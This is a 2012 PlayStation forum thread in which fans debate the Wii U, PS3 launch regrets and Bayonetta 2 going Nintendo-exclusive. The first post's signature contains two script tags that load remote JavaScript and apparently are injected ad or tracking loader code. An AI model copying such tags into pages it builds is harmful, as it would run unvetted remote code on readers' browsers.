Wastelander
766 posts

Re: so now do you all believe me?

Sep 13, 2012

yes because we all care what nintendo does on the psn forum

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 11 of 25 (133 Views)
0 Likes
Fender Bender
2698 posts

Sep 13, 2012

That's pretty cool news if its true.  Any links to support it?  I can't wait for the next generation of systems since the current one was such a failure.  And to those of you Sony F@n boys here saying its a PS forum.  Its called the  "Off-Topic" section.  Stop getting so butt hurt every time you see something that's not a Sony product on here.

Juli photo juli6.gif
Message 12 of 25 (128 Views)
0 Likes
Highlighted
Lombax Warrior
200 posts

Sep 13, 2012
I remember back when I bought the PS3 when it came out, and man I was so excited.

Even though people were all "it's too expensive" I ended up getting it because of how happy I was with the PS2 and thought I would be the same.

Bought Resisntance 1 and Gundam because I thought it looked so amazing. Then got Motorstorm later.

You know what I can admit to myself now? It sucked balls. Seriously the PS3 for it's launch games and first few years really sucked. I kept lying to myself because deep inside I was a Sony fanboy and didn't want to admit but the PS3 really sucked big time until 2008 and 09, that's when we started to get all these big amazing games.

Looking at the Wii U now, the price range is good, it already has 5 launch games I want to buy which is a first. Will most likely end up getting it.

Message 13 of 25 (124 Views)
Fender Bender
2698 posts

Sep 14, 2012

I was on the exact same boat lol.  I bought my Ps3 in Fall 2008 after the first price cut at $499.  Resistance 1 and Elder Scrolls 4 were my first games.  I spent the money because I liked the PS1 and PS2 so much.  I was the biggest Sony fan boy too.  All of my co-workers owned 360s and Wii's.  They would ask me "So what's good on PS3?"  They weren't even trolling, it was a serious question.  I would tell them "Uh... There's a lot of good games coming out, just wait".  I was just talking out of my **bleep** those first few years...  Lying to myself.

Later on, I even gave the 360 a chance and actually liked it.  I loved Dead Rising 1 and Geometry Wars.  I realized the one system fan boy mentally was retarded.  You can't knock anything until you tried it.

I do spend more time on PS3 now, because just recently we finally get the better exclusives.  And it's towards the end of the current gen already Smiley Indifferent.

So yea, $300-$350 for a Wii-U at launch does sound a lot better than $499-$599 for a PS3 at launch.

Juli photo juli6.gif
Message 14 of 25 (118 Views)
0 Likes
Lombax Warrior
200 posts

Sep 14, 2012

dc4daniel wrote:

I was on the exact same boat lol.  I bought my Ps3 in Fall 2008 after the first price cut at $499.  Resistance 1 and Elder Scrolls 4 were my first games.  I spent the money because I liked the PS1 and PS2 so much.  I was the biggest Sony fan boy too.  All of my co-workers owned 360s and Wii's.  They would ask me "So what's good on PS3?"  They weren't even trolling, it was a serious question.  I would tell them "Uh... There's a lot of good games coming out, just wait".  I was just talking out of my **bleep** those first few years...  Lying to myself.

Later on, I even gave the 360 a chance and actually liked it.  I loved Dead Rising 1 and Geometry Wars.  I realized the one system fan boy mentally was retarded.  You can't knock anything until you tried it.

I do spend more time on PS3 now, because just recently we finally get the better exclusives.  And it's towards the end of the current gen already Smiley Indifferent.

So yea, $300-$350 for a Wii-U at launch does sound a lot better than $499-$599 for a PS3 at launch.

Sam exact boat man.

I played nothing but my Wii and 360 while my PS3 just sat there, and now haven't subscripted to Xbox Live since 2 years ago because I been doing nothing but play on my PS3 now.  PS3 got so many great exclusives and so much improvement over their past games these past 4 years.

Message 15 of 25 (115 Views)
0 Likes
Shinra Executive
42141 posts

Sep 14, 2012

dc4daniel wrote:

That's pretty cool news if its true.  Any links to support it?  I can't wait for the next generation of systems since the current one was such a failure.  And to those of you Sony F@n boys here saying its a PS forum.  Its called the  "Off-Topic" section.  Stop getting so butt hurt every time you see something that's not a Sony product on here.

I still need to get caught up but I'm not looking forward to the 'bridging' period between the gens.  With the way this gen was (time exclusives, DLC, studios shutting down, everything multiplatform, etc.) and with Nintendo trying to appeal to the hardcore again (making moves like Bayonetta 2 and Monster Hunter in the handheld and console area) on top of MS most likely going to try and buy up 3rd party exclusives like they did earlier this gen to get their footing as well, I'm not looking forward at all to some of the franchises I'm keeping an eye on from the PS3/PSP 'fragmenting' to the other 2 as 'exclusives' during the transition.  That's just one thing I'm not looking forward to as some series get 'poached' so to speak.

Message 16 of 25 (113 Views)
0 Likes
MVP Support
12485 posts

[ Edited ]
Sep 14, 2012

SlashZaku wrote:

zeothedeathgod wrote:

ATOMB0Y_ wrote:

honestly it will sell exspecially when the kids see it b4 christmas,  don't plan on it untill quiote awhile down the road just too much **bleep** in games in the present time

yeahSmiley Happy people **bleep** nintendo pays more;p

This actually seems to be pissing off a lot of Bayonetta **bleep** up what was done and to get another 'hardcore' title in their lineup but since it's SEGA's IP, they can probably go the NG2/NGS2 route later and port it to PS3/360 or even the PS4/Next Xbox but that depends on what the dealings are with the whole thing.

If Bayonetta 2 remains a Nintendo exclusive then I will be extremely disappointed. I’m already disappointed with this news as it stands. Bayonetta is one of my all-time favorite video games but it will take more than a sequel for it to encourage me to purchase a Nintendo Wii U. *shrugs*

PlayStation Consumer Services and Technical Support: 1-800-345-7669

PlayStation Account and Billing Support: 1-877-971-7669

Twitter: @Sweet13Poison | YouTube: Sweetest13Poison | Twitch: Sweet13Poison

Message 17 of 25 (97 Views)
0 Likes
Lombax Warrior
196 posts

Sep 14, 2012

Im sticking with Sony Ive always been very happy with their consoles, Nintendo in the past has not offered enough products that I care for. This post rubs me the wrong way, its like a little kid playing the I told you so game.

Message 18 of 25 (86 Views)
0 Likes
Shinra Executive
42141 posts

Sep 14, 2012

SweetPoison13 wrote:

If Bayonetta 2 remains a Nintendo exclusive then I will be extremely disappointed. I’m already disappointed with this news as it stands. Bayonetta is one of my all-time favorite video games but it will take more than a sequel for it to encourage me to purchase a Nintendo Wii U. *shrugs*

Take this as you will:

Tatsuya Minami
President & CEO, PlatinumGames Inc.

On September 13, 2012 Bayonetta 2 was announced as an exclusive title under development for the Wii U during the Nintendo Direction presentation held on the same day.

As game developers, we are incredibly excited to be able to announce a new title to all of our fans; however, we are aware that the announcement may have come as a shock to many of you.

As with Bayonetta, Bayonetta 2 is under development and production here at PlatinumGames, and is a true sequel to the acclaimed first game in the series. Bayonetta is one of our most beloved titles, and it played a large part in establishing PlatinumGames as an emerging game studio in the minds of users worldwide. Bayonetta has fans the world over, and we would never dream of alienating them from participating in the future of PlatinumGames.

That being said, the console games market is in a state of upheaval, so establishing a new game franchise requires a considerable amount of will, determination, and love. Bayonetta is a brand that we want to see become stronger, reaching the hands of more and more gamers, so we have continued to consult with SEGA, the previous game’s publisher, on how we can make sure this takes place. Our answer was a new partnership with Nintendo.

Along with their new hardware, Nintendo, as a company, is dedicated to establishing a new future for the games industry, as you can tell by their record of passionate support for gaming. Alongside Nintendo, we hope to grow the Bayonetta brand beyond where it stands today, allowing even more gamers around the world to experience the action of our beloved witch. As developers, we are working hard to make this a reality.

We hope that you will look forward to what we have in store.

Siliconera

So now I'm wondering if this is going to turn out to be some sort of 'Fatal Frame' deal where Nintendo starts publishing the games and eventually ends up a 'co-owner' of the IP with the initial publisher (in this case, SEGA).  I know people like to point out that if you're a fan of a franchise, you'll go where it goes but situations like this do suck for some fans who just want to invest in a certain platform (or family of platforms) because of funding/focus being easier and kind of expect to see sequels/new installments to franchises that have already appeared for that brand =\

Message 19 of 25 (80 Views)
0 Likes
MVP Support
12485 posts

[ Edited ]
Sep 16, 2012

SlashZaku wrote:

SweetPoison13 wrote:

Take this as you will:

Tatsuya Minami
President & CEO, PlatinumGames Inc.

On September 13, 2012 Bayonetta 2 was announced as an exclusive title under development for the Wii U during the Nintendo Direction presentation held on the same day.

As game developers, we are incredibly excited to be able to announce a new title to all of our fans; however, we are aware that the announcement may have come as a shock to many of you.

As with Bayonetta, Bayonetta 2 is under development and production here at PlatinumGames, and is a true sequel to the acclaimed first game in the series. Bayonetta is one of our most beloved titles, and it played a large part in establishing PlatinumGames as an emerging game studio in the minds of users worldwide. Bayonetta has fans the world over, and we would never dream of alienating them from participating in the future of PlatinumGames.

That being said, the console games market is in a state of upheaval, so establishing a new game franchise requires a considerable amount of will, determination, and love. Bayonetta is a brand that we want to see become stronger, reaching the hands of more and more gamers, so we have continued to consult with SEGA, the previous game’s publisher, on how we can make sure this takes place. Our answer was a new partnership with Nintendo.

Along with their new hardware, Nintendo, as a company, is dedicated to establishing a new future for the games industry, as you can tell by their record of passionate support for gaming. Alongside Nintendo, we hope to grow the Bayonetta brand beyond where it stands today, allowing even more gamers around the world to experience the action of our beloved witch. As developers, we are working hard to make this a reality.

We hope that you will look forward to what we have in store.

Siliconera

So now I'm wondering if this is going to turn out to be some sort of 'Fatal Frame' deal where Nintendo starts publishing the games and eventually ends up a 'co-owner' of the IP with the initial publisher (in this case, SEGA).  I know people like to point out that if you're a fan of a franchise, you'll go where it goes but situations like this do suck for some fans who just want to invest in a certain platform (or family of platforms) because of funding/focus being easier and kind of expect to see sequels/new installments to franchises that have already appeared for that brand =\

I cannot look forward to video games that come out on video game consoles that I have no intention of purchasing (a $300+ investment for one video game simply isn’t worth it). I guess I could watch someone play through Bayonetta 2 on YouTube... Nah... It is nice to believe that fans will go wherever developers encourage them to go and follow their favorite franchises for as long as possible but the reality of the situation can be very different. The decision to make Bayonetta 2 an exclusive Nintendo Wii U title comes off as a slap in the face to the fans who helped establish Platinum Games as an emerging video game studio. I feel sad for SEGA for some reason and I worry about the future of Platinum Games in light of everything that I have been hearing about this so far. It’s a shame really because I would have gladly purchased Bayonetta 2 over DmC: Devil May Cry.

I have my fingers crossed that Bayonetta 2 will end up a timed exclusive at some point. Smiley Sad

PlayStation Consumer Services and Technical Support: 1-800-345-7669

PlayStation Account and Billing Support: 1-877-971-7669

Twitter: @Sweet13Poison | YouTube: Sweetest13Poison | Twitch: Sweet13Poison

Message 20 of 25 (75 Views)
0 Likes